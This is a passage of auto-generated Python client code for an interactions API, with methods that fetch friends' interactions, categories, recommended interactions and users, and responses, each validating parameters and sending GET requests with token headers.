for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_friends_interactions" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_status' is set if ('interaction_status' not in params) or (params['interaction_status'] is None): raise ValueError("Missing the required parameter `interaction_status` when calling `get_friends_interactions`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_friends_interactions`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_friends_interactions`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_friends_interactions`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_friends_interactions`") resource_path = '/interactions/friends'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_status' in params: query_params['interactionStatus'] = params['interaction_status'] if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'category_id' in params: query_params['categoryId'] = params['category_id'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_interaction(self, interaction_id, requester_id, client_token, **kwargs): """ Get interaction by id Returns the interaction by id This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.get_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def get_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Get interaction by id Returns the interaction by id This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `get_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_interaction`") resource_path = '/interactions/{interactionId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_interaction_categories(self, start, end, requester_id, client_token, **kwargs): """ Get the list of interaction categories Returns the list of interaction categories This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction_categories(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategoryList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_interaction_categories_with_http_info(start, end, requester_id, client_token, **kwargs) else: (data) = self.get_interaction_categories_with_http_info(start, end, requester_id, client_token, **kwargs) return data def get_interaction_categories_with_http_info(self, start, end, requester_id, client_token, **kwargs): """ Get the list of interaction categories Returns the list of interaction categories This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interaction_categories_with_http_info(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategoryList If the method is called asynchronously, returns the request thread. """ all_params = ['start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_interaction_categories" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_interaction_categories`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_interaction_categories`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_interaction_categories`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_interaction_categories`") resource_path = '/interactions/categories'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategoryList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_interactions_for_user(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of all interactions visible to the user Returns the list of all interactions visible to the user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interactions_for_user(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_interactions_for_user_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_interactions_for_user_with_http_info(interaction_status, start, end, requester_id, client_token, **kwargs) return data def get_interactions_for_user_with_http_info(self, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of all interactions visible to the user Returns the list of all interactions visible to the user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_interactions_for_user_with_http_info(interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_status', 'start', 'end', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_interactions_for_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_status' is set if ('interaction_status' not in params) or (params['interaction_status'] is None): raise ValueError("Missing the required parameter `interaction_status` when calling `get_interactions_for_user`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_interactions_for_user`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_interactions_for_user`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_interactions_for_user`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_interactions_for_user`") resource_path = '/interactions'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_status' in params: query_params['interactionStatus'] = params['interaction_status'] if 'category_id' in params: query_params['categoryId'] = params['category_id'] if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_recommend_interactions(self, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions Returns the list of recommended interactions This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommend_interactions(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: interactionType :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_recommend_interactions_with_http_info(start, end, requester_id, client_token, **kwargs) else: (data) = self.get_recommend_interactions_with_http_info(start, end, requester_id, client_token, **kwargs) return data def get_recommend_interactions_with_http_info(self, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions Returns the list of recommended interactions This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommend_interactions_with_http_info(start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: interactionType :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_recommend_interactions" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_recommend_interactions`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_recommend_interactions`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_recommend_interactions`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_recommend_interactions`") resource_path = '/interactions/recommend'.replace('{format}', 'json') path_params = {} query_params = {} if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_recommended_interactins_from_db(self, user_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions from DB Returns the list of recommended interactions from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_interactins_from_db(user_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: User Id whose recommended interactions want to get (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_recommended_interactins_from_db_with_http_info(user_id, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_recommended_interactins_from_db_with_http_info(user_id, start, end, requester_id, client_token, **kwargs) return data def get_recommended_interactins_from_db_with_http_info(self, user_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended interactions from DB Returns the list of recommended interactions from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_interactins_from_db_with_http_info(user_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: User Id whose recommended interactions want to get (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['user_id', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_recommended_interactins_from_db" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_id' is set if ('user_id' not in params) or (params['user_id'] is None): raise ValueError("Missing the required parameter `user_id` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_recommended_interactins_from_db`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_recommended_interactins_from_db`") resource_path = '/interactions/{userId}/recommendedInteractions'.replace('{format}', 'json') path_params = {} if 'user_id' in params: path_params['userId'] = params['user_id'] query_params = {} if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_recommended_users_from_db(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended Users from DB Returns the list of recommended users from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_users_from_db(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)userId 2)firstName 3)lastName 4)profileImage **A) Available values-** 1)userId 2)firstName 3)lastName 4)emailId 5)profileImage 6)birthDate */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseUserList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_recommended_users_from_db_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_recommended_users_from_db_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) return data def get_recommended_users_from_db_with_http_info(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of recommended Users from DB Returns the list of recommended users from DB This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_recommended_users_from_db_with_http_info(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)userId 2)firstName 3)lastName 4)profileImage **A) Available values-** 1)userId 2)firstName 3)lastName 4)emailId 5)profileImage 6)birthDate */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseUserList If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'start', 'end', 'requester_id', 'client_token', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_recommended_users_from_db" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `get_recommended_users_from_db`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_recommended_users_from_db`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_recommended_users_from_db`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_recommended_users_from_db`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_recommended_users_from_db`") resource_path = '/interactions/{interactionId}/recommendedUsers'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseUserList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_responses(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of responses by interactionId Returns the list of responses by interactionId This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_responses(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponseList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_responses_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_responses_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) return data def 